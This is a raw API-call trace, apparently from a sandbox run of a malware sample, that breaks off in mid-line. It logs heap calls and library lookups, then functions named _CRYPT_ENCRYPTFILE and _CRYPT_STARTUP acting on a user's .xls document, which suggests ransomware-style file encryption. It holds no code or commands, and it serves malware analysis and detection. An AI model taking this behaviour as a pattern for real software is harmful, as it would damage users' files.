0x9ba0f0 [0173.879] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0173.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0173.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0173.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0173.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0173.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0173.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0173.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0173.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0173.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0173.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0173.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0173.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0173.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0173.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0173.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0173.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0173.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0173.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0173.880] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0173.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0173.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0173.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0173.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdb10 [0173.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bdb10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0173.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0173.880] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0173.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0173.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0173.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0173.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0173.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0173.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0173.881] CloseHandle (hObject=0x120) returned 1 [0173.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0173.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0173.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0173.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0173.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0173.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0173.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0173.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0173.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0173.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0173.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0173.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0173.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0173.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0173.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0173.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0173.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0173.882] FreeLibrary (hLibModule=0x75990000) returned 1 [0173.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0173.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0173.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0173.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0173.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0173.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0173.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0173.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0173.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0173.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0173.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0173.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0173.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0173.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0173.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0173.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0173.882] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0173.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0173.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0173.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0173.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0173.883] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0173.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0173.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0173.883] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0173.883] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0173.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0173.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0173.883] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0173.883] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0173.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0173.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0173.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0173.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0173.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0173.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ls", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xls", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xls", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0173.883] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0173.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0173.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0173.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0173.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0173.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0173.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0173.884] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0173.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0173.884] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0173.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0173.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0173.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0173.884] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mV3Nzu4vWV4hC.xls", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f6963d0, ftCreationTime.dwHighDateTime=0x1d5e41e, ftLastAccessTime.dwLowDateTime=0x20c90830, ftLastAccessTime.dwHighDateTime=0x1d5dc39, ftLastWriteTime.dwLowDateTime=0x20c90830, ftLastWriteTime.dwHighDateTime=0x1d5dc39, nFileSizeHigh=0x0, nFileSizeLow=0xfe17, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="mV3Nzu4vWV4hC.xls", cAlternateFileName="MV3NZU~1.XLS")) returned 0x90add8 [0173.884] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0173.884] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.884] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mV3Nzu4vWV4hC.xls", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f6963d0, ftCreationTime.dwHighDateTime=0x1d5e41e, ftLastAccessTime.dwLowDateTime=0x20c90830, ftLastAccessTime.dwHighDateTime=0x1d5dc39, ftLastWriteTime.dwLowDateTime=0x20c90830, ftLastWriteTime.dwHighDateTime=0x1d5dc39, nFileSizeHigh=0x0, nFileSizeLow=0xfe17, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="mV3Nzu4vWV4hC.xls", cAlternateFileName="MV3NZU~1.XLS")) returned 0x90add8 [0173.885] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0173.885] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mV3Nzu4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mV3Nzu4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mV3Nzu4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mV3Nzu4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mV3Nzu4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\mV3Nzu4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\mV3Nzu4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\mV3Nzu4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\mV3Nzu4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\mV3Nzu4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\mV3Nzu4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\mV3Nzu4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\mV3Nzu4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\mV3Nzu4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\mV3Nzu4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\mV3Nzu4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\mV3Nzu4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\mV3Nzu4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\mV3Nzu4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\mV3Nzu4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\mV3Nzu4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\mV3Nzu4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\mV3Nzu4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\mV3Nzu4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\mV3Nzu4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\mV3Nzu4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\mV3Nzu4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\mV3Nzu4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\mV3Nzu4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\mV3Nzu4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\mV3Nzu4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\mV3Nzu4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\mV3Nzu4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\mV3Nzu4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\mV3Nzu4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\mV3Nzu4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\mV3Nzu4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\mV3Nzu4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\mV3Nzu4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\mV3Nzu4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\mV3Nzu4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mV3Nzu4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V3Nzu4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3Nzu4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Nzu4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zu4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="u4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vWV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WV4hC.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.887] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.887] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0173.887] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0173.887] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0173.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ls", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xls", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xls", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0173.887] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0173.887] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0173.887] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0173.887] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0173.887] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.887] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mV3Nzu4vWV4hC.xls", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f6963d0, ftCreationTime.dwHighDateTime=0x1d5e41e, ftLastAccessTime.dwLowDateTime=0x20c90830, ftLastAccessTime.dwHighDateTime=0x1d5dc39, ftLastWriteTime.dwLowDateTime=0x20c90830, ftLastWriteTime.dwHighDateTime=0x1d5dc39, nFileSizeHigh=0x0, nFileSizeLow=0xfe17, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="mV3Nzu4vWV4hC.xls", cAlternateFileName="MV3NZU~1.XLS")) returned 0x90af58 [0173.888] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0173.888] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.888] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: 